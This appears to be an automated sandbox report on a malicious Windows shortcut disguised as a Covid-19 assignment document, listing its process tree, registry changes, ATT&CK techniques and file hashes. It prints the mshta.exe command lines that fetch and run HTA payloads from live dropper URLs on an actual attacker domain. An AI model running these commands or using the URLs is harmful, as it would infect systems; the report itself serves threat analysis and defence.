1af2c8d963b56512e04a7f2136b3794f4172ae089e72880119e6bcdba4e9df9c

Analysis

max time kernel
302s
max time network
343s
platform
windows10-2004_x64
resource
win10v2004-20220310-en
submitted
22-03-2022 12:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

samples/Assignment-Covid-19.docx.lnk

Score

10^/10

persistence

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

https://www.inapharma.in/css/files/docs/Assignment-Covid-19/css

Extracted

Language

hta

Source

URLs

hta.dropper

https://inapharma.in/css/files/awanda/http/

Signatures

Blocklisted process makes network request 7 IoCs

Processes:

mshta.exemshta.exe

flow pid process

22 1620 mshta.exe
24 1620 mshta.exe
26 1620 mshta.exe
27 1620 mshta.exe
31 1620 mshta.exe
33 4184 mshta.exe
34 1620 mshta.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

cmd.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation cmd.exe

flow	pid	process
22	1620	mshta.exe
24	1620	mshta.exe
26	1620	mshta.exe
27	1620	mshta.exe
31	1620	mshta.exe
33	4184	mshta.exe
34	1620	mshta.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	cmd.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

msedge.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Windows\CurrentVersion\Run	msedge.exe

Drops file in Program Files directory 2 IoCs

Processes:

setup.exe

description	ioc	process
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\dfb847ce-05a4-4b1f-a2c0-b00be02b7510.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220322133943.pma	setup.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Modifies data under HKEY_USERS 1 IoCs

Processes:

svchost.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe
Modifies registry class 1 IoCs

Processes:

msedge.exe

description ioc process

Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

mshta.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	mshta.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	mshta.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

Processes:

msedge.exemsedge.exeidentity_helper.exemsedge.exe

pid	process
3192	msedge.exe
3192	msedge.exe
3856	msedge.exe
3856	msedge.exe
3396	identity_helper.exe
3396	identity_helper.exe
2440	msedge.exe
2440	msedge.exe
2440	msedge.exe
2440	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

Processes:

msedge.exe

pid process

3856 msedge.exe
3856 msedge.exe
3856 msedge.exe
3856 msedge.exe
3856 msedge.exe

pid	process
3856	msedge.exe
3856	msedge.exe
3856	msedge.exe
3856	msedge.exe
3856	msedge.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

mshta.exesvchost.exe

description	pid	process
Token: SeDebugPrivilege	1620	mshta.exe
Token: SeTcbPrivilege	1016	svchost.exe
Token: SeTcbPrivilege	1016	svchost.exe
Token: SeTcbPrivilege	1016	svchost.exe
Token: SeTcbPrivilege	1016	svchost.exe
Token: SeTcbPrivilege	1016	svchost.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

msedge.exe

pid process

3856 msedge.exe
3856 msedge.exe

pid	process
3856	msedge.exe
3856	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exemshta.exemsedge.exe

description	pid	process	target process
PID 3088 wrote to memory of 1620	3088	cmd.exe	mshta.exe
PID 3088 wrote to memory of 1620	3088	cmd.exe	mshta.exe
PID 1620 wrote to memory of 3856	1620	mshta.exe	msedge.exe
PID 1620 wrote to memory of 3856	1620	mshta.exe	msedge.exe
PID 3856 wrote to memory of 4160	3856	msedge.exe	msedge.exe
PID 3856 wrote to memory of 4160	3856	msedge.exe	msedge.exe
PID 1620 wrote to memory of 4184	1620	mshta.exe	mshta.exe
PID 1620 wrote to memory of 4184	1620	mshta.exe	mshta.exe
PID 3856 wrote to memory of 4476	3856	msedge.exe	msedge.exe
PID 3856 wrote to memory of 4476	3856	msedge.exe	msedge.exe
PID 3856 wrote to memory of 4476	3856	msedge.exe	msedge.exe
PID 3856 wrote to memory of 4476	3856	msedge.exe	msedge.exe
PID 3856 wrote to memory of 4476	3856	msedge.exe	msedge.exe
PID 3856 wrote to memory of 4476	3856	msedge.exe	msedge.exe
PID 3856 wrote to memory of 4476	3856	msedge.exe	msedge.exe
PID 3856 wrote to memory of 4476	3856	msedge.exe	msedge.exe
PID 3856 wrote to memory of 4476	3856	msedge.exe	msedge.exe
PID 3856 wrote to memory of 4476	3856	msedge.exe	msedge.exe
PID 3856 wrote to memory of 4476	3856	msedge.exe	msedge.exe
PID 3856 wrote to memory of 4476	3856	msedge.exe	msedge.exe
PID 3856 wrote to memory of 4476	3856	msedge.exe	msedge.exe
PID 3856 wrote to memory of 4476	3856	msedge.exe	msedge.exe
PID 3856 wrote to memory of 4476	3856	msedge.exe	msedge.exe
PID 3856 wrote to memory of 4476	3856	msedge.exe	msedge.exe
PID 3856 wrote to memory of 4476	3856	msedge.exe	msedge.exe
PID 3856 wrote to memory of 4476	3856	msedge.exe	msedge.exe
PID 3856 wrote to memory of 4476	3856	msedge.exe	msedge.exe
PID 3856 wrote to memory of 4476	3856	msedge.exe	msedge.exe
PID 3856 wrote to memory of 4476	3856	msedge.exe	msedge.exe
PID 3856 wrote to memory of 4476	3856	msedge.exe	msedge.exe
PID 3856 wrote to memory of 4476	3856	msedge.exe	msedge.exe
PID 3856 wrote to memory of 4476	3856	msedge.exe	msedge.exe
PID 3856 wrote to memory of 4476	3856	msedge.exe	msedge.exe
PID 3856 wrote to memory of 4476	3856	msedge.exe	msedge.exe
PID 3856 wrote to memory of 4476	3856	msedge.exe	msedge.exe
PID 3856 wrote to memory of 4476	3856	msedge.exe	msedge.exe
PID 3856 wrote to memory of 4476	3856	msedge.exe	msedge.exe
PID 3856 wrote to memory of 4476	3856	msedge.exe	msedge.exe
PID 3856 wrote to memory of 4476	3856	msedge.exe	msedge.exe
PID 3856 wrote to memory of 4476	3856	msedge.exe	msedge.exe
PID 3856 wrote to memory of 4476	3856	msedge.exe	msedge.exe
PID 3856 wrote to memory of 4476	3856	msedge.exe	msedge.exe
PID 3856 wrote to memory of 4476	3856	msedge.exe	msedge.exe
PID 3856 wrote to memory of 4476	3856	msedge.exe	msedge.exe
PID 3856 wrote to memory of 4476	3856	msedge.exe	msedge.exe
PID 3856 wrote to memory of 4476	3856	msedge.exe	msedge.exe
PID 3856 wrote to memory of 4476	3856	msedge.exe	msedge.exe
PID 3856 wrote to memory of 4476	3856	msedge.exe	msedge.exe
PID 3856 wrote to memory of 3192	3856	msedge.exe	msedge.exe
PID 3856 wrote to memory of 3192	3856	msedge.exe	msedge.exe
PID 3856 wrote to memory of 4144	3856	msedge.exe	msedge.exe
PID 3856 wrote to memory of 4144	3856	msedge.exe	msedge.exe
PID 3856 wrote to memory of 4144	3856	msedge.exe	msedge.exe
PID 3856 wrote to memory of 4144	3856	msedge.exe	msedge.exe
PID 3856 wrote to memory of 4144	3856	msedge.exe	msedge.exe
PID 3856 wrote to memory of 4144	3856	msedge.exe	msedge.exe
PID 3856 wrote to memory of 4144	3856	msedge.exe	msedge.exe
PID 3856 wrote to memory of 4144	3856	msedge.exe	msedge.exe
PID 3856 wrote to memory of 4144	3856	msedge.exe	msedge.exe
PID 3856 wrote to memory of 4144	3856	msedge.exe	msedge.exe
PID 3856 wrote to memory of 4144	3856	msedge.exe	msedge.exe
PID 3856 wrote to memory of 4144	3856	msedge.exe	msedge.exe
PID 3856 wrote to memory of 4144	3856	msedge.exe	msedge.exe
PID 3856 wrote to memory of 4144	3856	msedge.exe	msedge.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\samples\Assignment-Covid-19.docx.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3088

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" https://www.inapharma.in/css/files/docs/Assignment-Covid-19/css
2⤵
- Blocklisted process makes network request
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1620

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\Survey-Paper-Covid-19.pdf
3⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3856

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xf8,0x108,0x7ffeb20a46f8,0x7ffeb20a4708,0x7ffeb20a4718
4⤵
PID:4160

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2328,10957527560776086265,9873100065652089575,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2580 /prefetch:2
4⤵
PID:4476

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2328,10957527560776086265,9873100065652089575,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2776 /prefetch:3
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3192

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2328,10957527560776086265,9873100065652089575,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3060 /prefetch:8
4⤵
PID:4144

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2328,10957527560776086265,9873100065652089575,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3712 /prefetch:1
4⤵
PID:4180

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2328,10957527560776086265,9873100065652089575,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3716 /prefetch:1
4⤵
PID:3148

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2328,10957527560776086265,9873100065652089575,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5212 /prefetch:8
4⤵
PID:408

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2328,10957527560776086265,9873100065652089575,131072 --disable-gpu-compositing --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5216 /prefetch:1
4⤵
PID:972

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --field-trial-handle=2328,10957527560776086265,9873100065652089575,131072 --lang=en-US --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=5408 /prefetch:6
4⤵
PID:2552

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2328,10957527560776086265,9873100065652089575,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5972 /prefetch:1
4⤵
PID:4240

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2328,10957527560776086265,9873100065652089575,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5984 /prefetch:1
4⤵
PID:4440

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2328,10957527560776086265,9873100065652089575,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6928 /prefetch:8
4⤵
PID:4076

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
4⤵
- Drops file in Program Files directory
PID:3708

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff60bf35460,0x7ff60bf35470,0x7ff60bf35480
5⤵
PID:848

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2328,10957527560776086265,9873100065652089575,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6928 /prefetch:8
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3396

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2328,10957527560776086265,9873100065652089575,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2232 /prefetch:8
4⤵
PID:4352

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2328,10957527560776086265,9873100065652089575,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4280 /prefetch:8
4⤵
PID:2224

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2328,10957527560776086265,9873100065652089575,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1340 /prefetch:2
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2440

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2328,10957527560776086265,9873100065652089575,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1868 /prefetch:8
4⤵
PID:4868

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2328,10957527560776086265,9873100065652089575,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4328 /prefetch:8
4⤵
PID:3348

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2328,10957527560776086265,9873100065652089575,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4372 /prefetch:8
4⤵
PID:2380

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2328,10957527560776086265,9873100065652089575,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6876 /prefetch:8
4⤵
PID:1100

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2328,10957527560776086265,9873100065652089575,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5776 /prefetch:8
4⤵
PID:1080

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2328,10957527560776086265,9873100065652089575,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6472 /prefetch:8
4⤵
PID:3808

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" https://inapharma.in/css/files/awanda/http/
3⤵
- Blocklisted process makes network request
PID:4184

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
1⤵
- Modifies data under HKEY_USERS
PID:456

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4740

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1016

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
1⤵
PID:1980

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Install Root Certificate

T1130

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Mu\Advertising
Filesize
24KB

MD5
4e9962558e74db5038d8073a5b3431aa

SHA1
3cd097d9dd4b16a69efbb0fd1efe862867822146

SHA256
6f81212bd841eca89aa6f291818b4ad2582d7cdb4e488adea98261494bdcd279

SHA512
fcd76bca998afc517c87de0db6ee54e45aa2263fa7b91653ac3adb34c41f3681fbe19d673ae9b24fdf3d53f5af4e4968e603a1eb557207f8860ac51372026b2e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Mu\Analytics
Filesize
4KB

MD5
fad197d6ffd32d1268b9e7e8d13ab32a

SHA1
b0129887a75965bb2ef56a2c39d3231e5b87265d

SHA256
4e446af739e1a06b48a73607e9441bc4aa34ceafd808ff845864408179a4d2c3

SHA512
01d9f588bfa315e316ff0ff4a15a0a49144fd77ee89960882cd528d7f7a277b086667cea2357c3ca2bd16a2b3f4aeb7fcaf473501b499101be68acbe1e0126cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Mu\CompatExceptions
Filesize
660B

MD5
900263477e1368869fbf1be99990c878

SHA1
e56e199aa4119f3cc4c4d46f96daea89bbf9685a

SHA256
7f660d9db521646e9c6510d844b6c6ea26716b620c46f34edaf7ce318a9473e4

SHA512
1035b388b4b00c744824d13c5ef48118d88abbb53e9d76896a2d96a2a127a7739c119e781d7d5f0b8d910e10539c0c502c9f937fc2487747c65e7285f4b1e6d2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Mu\Content
Filesize
6KB

MD5
94c183b842784d0ae69f8aa57c8ac015

SHA1
c5b1ebc2b5c140ccbb21cd377ca18f3c5d0b80cd

SHA256
aa5c4d50684aa478d5982e509cbf1f8347fbc9cc75cb847d54915c16c3a33d25

SHA512
5808ddb81657acf4712fa845c95aacbab32a414ffda3b9d1218637e2d53bd3e0d6b95c872779ead6eaa13b4d2d563494ad5587337958bd17f1e791fad5d822fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Mu\Cryptomining
Filesize
1KB

MD5
8c31feb9c3faaa9794aa22ce9f48bfbd

SHA1
f5411608a15e803afc97961b310bb21a6a8bd5b6

SHA256
6016fd3685046b33c7a2b1e785ac757df20e7c760abe0c27e1b8b0294222421d

SHA512
ba4b5886c04ba8f7a7dbb87e96d639783a5969a245de181cf620b8f536e3ac95bbd910cd2f1f6aae6c3cd70fc1ef6209dc10d2b083ec51861b51d83f95811baa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Mu\Entities
Filesize
68KB

MD5
0d37c9d98f35f2c6524bd9b874ec93ed

SHA1
87d2d1149db8a1c2d91bc8d2d6e2827d2d8850f5

SHA256
19ce05d2716fae5d0d6e2067a7a624c0fa7f8b02486d9469861fd30cf1c499ac

SHA512
68e73804a144cbe7287c2136ab1986c4e2a97c497d5bfd36ef5db0f1fb1b4a28839d63d83019082ce61af9b42853934888ce05d6b28350742776b97fa310a575

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Mu\Fingerprinting
Filesize
1KB

MD5
b51076d21461e00fcbf3dbd2c9e96b2b

SHA1
31311536cf570f2f9c88d21f03a935ac6e233231

SHA256
21a8d3e85d76761a1aab9dca765efef5dfa08d49db037befd91833e4639dd993

SHA512
3e193220ddddc47ecea32a2f777e55faa12c7a8052323455c8d7a89c01048155c77ae009fd0f5bebea89f1fae4a88b6b3ceca4e808064f474ea5b3a9497598cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Mu\Other
Filesize
34B

MD5
cd0395742b85e2b669eaec1d5f15b65b

SHA1
43c81d1c62fc7ff94f9364639c9a46a0747d122e

SHA256
